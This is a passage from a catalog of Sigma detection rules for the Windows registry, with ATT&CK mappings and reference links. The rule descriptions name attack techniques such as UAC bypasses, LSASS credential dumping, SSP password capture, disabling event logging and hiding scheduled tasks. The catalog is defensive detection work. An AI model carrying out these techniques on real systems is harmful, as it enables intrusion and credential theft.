https://learn.microsoft.com/en-us/windows/win32/wmisdk/connecting-to-wmi-remotely-starting-with-vista

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_set_enable_anonymous_connection.yml

PortProxy Registry Key

Detects the modification of the PortProxy registry key, which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.

The tag is: misp-galaxy:sigma-rules="PortProxy Registry Key"

PortProxy Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 9282. Table References

Links

https://adepts.of0x.cc/netsh-portproxy-code/

https://www.dfirnotes.net/portproxy_detection/

https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml

Registry Persistence Mechanisms in Recycle Bin

Detects persistence registry keys for the Recycle Bin

The tag is: misp-galaxy:sigma-rules="Registry Persistence Mechanisms in Recycle Bin"

Registry Persistence Mechanisms in Recycle Bin has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9283. Table References

Links

https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf

https://persistence-info.github.io/Data/recyclebin.html

https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml

DLL Load via LSASS

Detects a method of loading a DLL via the LSASS process using an undocumented registry key

The tag is: misp-galaxy:sigma-rules="DLL Load via LSASS"

DLL Load via LSASS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Driver - T1547.008" with estimative-language:likelihood-probability="almost-certain"

Table 9284. Table References

Links

https://blog.xpnsec.com/exploring-mimikatz-part-1/

https://twitter.com/SBousseaden/status/1183745981189427200

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_lsass_dll_load.yml

Path To Screensaver Binary Modified

Detects modification of the registry value containing the path to the binary used as the screensaver.

The tag is: misp-galaxy:sigma-rules="Path To Screensaver Binary Modified"

Path To Screensaver Binary Modified has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Screensaver - T1546.002" with estimative-language:likelihood-probability="almost-certain"

Table 9285. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md

https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml

PrinterNightmare Mimikatz Driver Name

Detects the static QMS 810 and mimikatz driver names used by Mimikatz when exploiting CVE-2021-1675 and CVE-2021-34527

The tag is: misp-galaxy:sigma-rules="PrinterNightmare Mimikatz Driver Name"

PrinterNightmare Mimikatz Driver Name has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 9286. Table References

Links

https://www.lexjansen.com/sesug/1993/SESUG93035.pdf

https://nvd.nist.gov/vuln/detail/cve-2021-34527

https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913

https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760

https://nvd.nist.gov/vuln/detail/cve-2021-1675

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml

Suspicious Run Key from Download

Detects suspicious Run keys created by software located in the Downloads directory or in temporary Outlook/Internet Explorer directories

The tag is: misp-galaxy:sigma-rules="Suspicious Run Key from Download"

Suspicious Run Key from Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9287. Table References

Links

https://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml

Windows Registry Trust Record Modification

Alerts on trust record modification within the registry, indicating usage of macros

The tag is: misp-galaxy:sigma-rules="Windows Registry Trust Record Modification"

Windows Registry Trust Record Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

Table 9288. Table References

Links

https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/

http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml

Run Once Task Configuration in Registry

Detects the configuration of the RunOnce registry key. The configured payload can be run by runonce.exe /AlternateShellStartup

The tag is: misp-galaxy:sigma-rules="Run Once Task Configuration in Registry"

Run Once Task Configuration in Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9289. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Runonce/

https://twitter.com/pabraeken/status/990717080805789697

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml

New DLL Added to AppCertDlls Registry Key

Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer.

The tag is: misp-galaxy:sigma-rules="New DLL Added to AppCertDlls Registry Key"

New DLL Added to AppCertDlls Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

Table 9290. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html

http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml

Potential Qakbot Registry Activity

Detects a registry key used by IceID in a campaign that distributes malicious OneNote files

The tag is: misp-galaxy:sigma-rules="Potential Qakbot Registry Activity"

Potential Qakbot Registry Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9291. Table References

Links

https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_malware_qakbot_registry.yml

Disable Security Events Logging Adding Reg Key MiniNt

Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, the Windows Event Log service will stop writing events.

The tag is: misp-galaxy:sigma-rules="Disable Security Events Logging Adding Reg Key MiniNt"

Disable Security Events Logging Adding Reg Key MiniNt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9292. Table References

Links

https://twitter.com/0gtweet/status/1182516740955226112

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml

Creation of a Local Hidden User Account by Registry

Sysmon registry detection of a local hidden user account.

The tag is: misp-galaxy:sigma-rules="Creation of a Local Hidden User Account by Registry"

Creation of a Local Hidden User Account by Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"

Table 9293. Table References

Links

https://twitter.com/SBousseaden/status/1387530414185664538

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml

Windows Credential Editor Registry

Detects the use of Windows Credential Editor (WCE)

The tag is: misp-galaxy:sigma-rules="Windows Credential Editor Registry"

Windows Credential Editor Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9294. Table References

Links

https://www.ampliasecurity.com/research/windows-credentials-editor/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml

Security Support Provider (SSP) Added to LSA Configuration

Detects the addition of an SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.

The tag is: misp-galaxy:sigma-rules="Security Support Provider (SSP) Added to LSA Configuration"

Security Support Provider (SSP) Added to LSA Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Support Provider - T1547.005" with estimative-language:likelihood-probability="almost-certain"

Table 9295. Table References

Links

https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml

Leviathan Registry Key Activity

Detects a registry key used by the Leviathan APT in a Malaysia-focused campaign

The tag is: misp-galaxy:sigma-rules="Leviathan Registry Key Activity"

Leviathan Registry Key Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9296. Table References

Links

https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml

OceanLotus Registry Activity

Detects registry keys created in OceanLotus (also known as APT32) attacks

The tag is: misp-galaxy:sigma-rules="OceanLotus Registry Activity"

OceanLotus Registry Activity has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9297. Table References

Links

https://github.com/eset/malware-ioc/tree/master/oceanlotus

https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml

UAC Bypass Via Wsreset

Detects an unfixed UAC bypass method on Windows 10. WSReset.exe is a file associated with the Windows Store; it will run a binary referenced in a low-privilege registry location.

The tag is: misp-galaxy:sigma-rules="UAC Bypass Via Wsreset"

UAC Bypass Via Wsreset has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9298. Table References

Links

https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly

https://lolbas-project.github.io/lolbas/Binaries/Wsreset

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml

NetNTLM Downgrade Attack - Registry

Detects a NetNTLM downgrade attack

The tag is: misp-galaxy:sigma-rules="NetNTLM Downgrade Attack - Registry"

NetNTLM Downgrade Attack - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9299. Table References

Links

https://web.archive.org/web/20171113231705/https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml

Sticky Key Like Backdoor Usage - Registry

Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen

The tag is: misp-galaxy:sigma-rules="Sticky Key Like Backdoor Usage - Registry"

Sticky Key Like Backdoor Usage - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1546.008" with estimative-language:likelihood-probability="almost-certain"

Table 9300. Table References

Links

https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/

https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml

New DLL Added to AppInit_DLLs Registry Key

DLLs that are specified in the AppInit_DLLs value in the registry key HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll.

The tag is: misp-galaxy:sigma-rules="New DLL Added to AppInit_DLLs Registry Key"

New DLL Added to AppInit_DLLs Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1546.010" with estimative-language:likelihood-probability="almost-certain"

Table 9301. Table References

Links

https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml

Narrator’s Feedback-Hub Persistence

Detects abuse of the Windows 10 Narrator’s Feedback-Hub

The tag is: misp-galaxy:sigma-rules="Narrator’s Feedback-Hub Persistence"

Narrator’s Feedback-Hub Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9302. Table References

Links

https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml

OilRig APT Registry Persistence

Detects OilRig registry persistence as reported by Nyotron in their March 2018 report

The tag is: misp-galaxy:sigma-rules="OilRig APT Registry Persistence"

OilRig APT Registry Persistence has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"

Table 9303. Table References

Links

https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oilrig_mar18.yml

Registry Entries For Azorult Malware

Detects the presence of a registry key created during Azorult execution

The tag is: misp-galaxy:sigma-rules="Registry Entries For Azorult Malware"

Registry Entries For Azorult Malware has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9304. Table References

Links

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml

CMSTP Execution Registry Event

Detects various indicators of Microsoft Connection Manager Profile Installer execution

The tag is: misp-galaxy:sigma-rules="CMSTP Execution Registry Event"

CMSTP Execution Registry Event has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="CMSTP - T1218.003" with estimative-language:likelihood-probability="almost-certain"

Table 9305. Table References

Links

https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml

Atbroker Registry Change

Detects the creation or modification of Assistive Technology applications and persistence through the usage of 'at'

The tag is: misp-galaxy:sigma-rules="Atbroker Registry Change"

Atbroker Registry Change has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9306. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Atbroker/

http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml

Wdigest CredGuard Registry Modification

Detects potentially malicious modification of the IsCredGuardEnabled value under HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest to disable Credential Guard on a system. This is usually used together with UseLogonCredential to manipulate credential caching.

The tag is: misp-galaxy:sigma-rules="Wdigest CredGuard Registry Modification"

Wdigest CredGuard Registry Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9307. Table References

Links

https://teamhydra.blog/2020/08/25/bypassing-credential-guard/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml

WINEKEY Registry Modification

Detects potentially malicious modification of Run keys by the winekey or team9 backdoor

The tag is: misp-galaxy:sigma-rules="WINEKEY Registry Modification"

WINEKEY Registry Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 9308. Table References

Links

https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml

HybridConnectionManager Service Installation - Registry

Detects the installation of the Azure Hybrid Connection Manager service, which allows remote code execution from an Azure function.

The tag is: misp-galaxy:sigma-rules="HybridConnectionManager Service Installation - Registry"

HybridConnectionManager Service Installation - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Stage Capabilities - T1608" with estimative-language:likelihood-probability="almost-certain"

Table 9309. Table References

Links

https://twitter.com/Cyb3rWard0g/status/1381642789369286662

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml

Esentutl Volume Shadow Copy Service Keys

Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\System\CurrentControlSet\Services\VSS\Diag\VolSnap\Volume are captured.

The tag is: misp-galaxy:sigma-rules="Esentutl Volume Shadow Copy Service Keys"

Esentutl Volume Shadow Copy Service Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

Table 9310. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml

Shell Open Registry Keys Manipulation

Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)

The tag is: misp-galaxy:sigma-rules="Shell Open Registry Keys Manipulation"

Shell Open Registry Keys Manipulation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001" with estimative-language:likelihood-probability="almost-certain"

Table 9311. Table References

Links

https://tria.ge/211119-gs7rtshcfr/behavioral2 (Lokibot sample from Nov 2021)

https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/

https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml

FlowCloud Malware

Detects FlowCloud malware from threat group TA410.

The tag is: misp-galaxy:sigma-rules="FlowCloud Malware"

FlowCloud Malware has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9312. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml

Potential Credential Dumping Via LSASS SilentProcessExit Technique

Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via LSASS SilentProcessExit Technique"

Potential Credential Dumping Via LSASS SilentProcessExit Technique has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9313. Table References

Links

https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/

https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml

Pandemic Registry Key

Detects Pandemic Windows Implant

The tag is: misp-galaxy:sigma-rules="Pandemic Registry Key"

Pandemic Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9314. Table References

Links

https://wikileaks.org/vault7/#Pandemic

https://twitter.com/MalwareJake/status/870349480356454401

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml

Terminal Server Client Connection History Cleared - Registry

Detects the deletion of registry keys containing the MSTSC connection history

The tag is: misp-galaxy:sigma-rules="Terminal Server Client Connection History Cleared - Registry"

Terminal Server Client Connection History Cleared - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9315. Table References

Links

https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html

http://woshub.com/how-to-clear-rdp-connections-history/

https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml

Removal Of SD Value to Hide Schedule Task - Registry

Detects the removal of the SD (Security Descriptor) value in the \Schedule\TaskCache\Tree registry hive to hide a scheduled task. This technique is used by Tarrask malware.

The tag is: misp-galaxy:sigma-rules="Removal Of SD Value to Hide Schedule Task - Registry"

Removal Of SD Value to Hide Schedule Task - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9316. Table References

Links

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml

Removal Of AMSI Provider Registry Keys

Detects the deletion of AMSI provider registry key entries in HKLM\Software\Microsoft\AMSI. This technique could be used by an attacker in order to disable AMSI inspection.

The tag is: misp-galaxy:sigma-rules="Removal Of AMSI Provider Registry Keys"

Removal Of AMSI Provider Registry Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9317. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://seclists.org/fulldisclosure/2020/Mar/45

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml

Folder Removed From Exploit Guard ProtectedFolders List - Registry

Detects the removal of folders from the "ProtectedFolders" list of Exploit Guard. This could indicate an attacker trying to launch an encryption process or trying to manipulate data inside of the protected folder.

The tag is: misp-galaxy:sigma-rules="Folder Removed From Exploit Guard ProtectedFolders List - Registry"

Folder Removed From Exploit Guard ProtectedFolders List - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9318. Table References

Links

https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml

Removal Of Index Value to Hide Schedule Task - Registry

Detects when the "index" value of a scheduled task is removed or deleted from the registry, which effectively hides it from tooling such as "schtasks /query".

The tag is: misp-galaxy:sigma-rules="Removal Of Index Value to Hide Schedule Task - Registry"

Removal Of Index Value to Hide Schedule Task - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Impair Defenses - T1562" with estimative-language:likelihood-probability="almost-certain"

Table 9319. Table References

Links

https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_index_value_removal.yml

Removal of Potential COM Hijacking Registry Keys

Detects any deletion of entries in ".*\shell\open\command" registry keys. These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks.

The tag is: misp-galaxy:sigma-rules="Removal of Potential COM Hijacking Registry Keys"

Removal of Potential COM Hijacking Registry Keys has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9320. Table References

Links

https://github.com/OTRF/detection-hackathon-apt29/issues/7

https://docs.microsoft.com/en-us/windows/win32/shell/launch

https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code

https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml

Potential Ursnif Malware Activity - Registry

Detects registry keys related to Ursnif malware.

The tag is: misp-galaxy:sigma-rules="Potential Ursnif Malware Activity - Registry"

Potential Ursnif Malware Activity - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9321. Table References

Links

https://blog.yoroi.company/research/ursnif-long-live-the-steganography/

https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_ursnif.yml

Potential COM Object Hijacking Via TreatAs Subkey - Registry

Detects COM object hijacking via TreatAs subkey

The tag is: misp-galaxy:sigma-rules="Potential COM Object Hijacking Via TreatAs Subkey - Registry"

Potential COM Object Hijacking Via TreatAs Subkey - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Component Object Model Hijacking - T1546.015" with estimative-language:likelihood-probability="almost-certain"

Table 9322. Table References

Links

https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_com_key_linking.yml

Potential Persistence Via Disk Cleanup Handler - Registry

Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence. The disk cleanup manager is part of the operating system. It displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager’s UI. Although Windows comes with a number of disk cleanup handlers, they aren’t designed to handle files produced by other applications. Instead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler. Any developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Disk Cleanup Handler - Registry"

Table 9323. Table References

Links

https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/

https://persistence-info.github.io/Data/diskcleanuphandler.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml

PUA - Sysinternal Tool Execution - Registry

Detects the execution of a Sysinternals Tool via the creation of the "accepteula" registry key

The tag is: misp-galaxy:sigma-rules="PUA - Sysinternal Tool Execution - Registry"

PUA - Sysinternal Tool Execution - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Tool - T1588.002" with estimative-language:likelihood-probability="almost-certain"

Table 9324. Table References

Links

https://twitter.com/Moti_B/status/1008587936735035392

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_pua_sysinternals_execution_via_eula.yml

Suspicious Execution Of Renamed Sysinternals Tools - Registry

Detects the creation of the "accepteula" key related to the Sysinternals tools being created from executables with the wrong name (e.g. a renamed Sysinternals tool)

The tag is: misp-galaxy:sigma-rules="Suspicious Execution Of Renamed Sysinternals Tools - Registry"

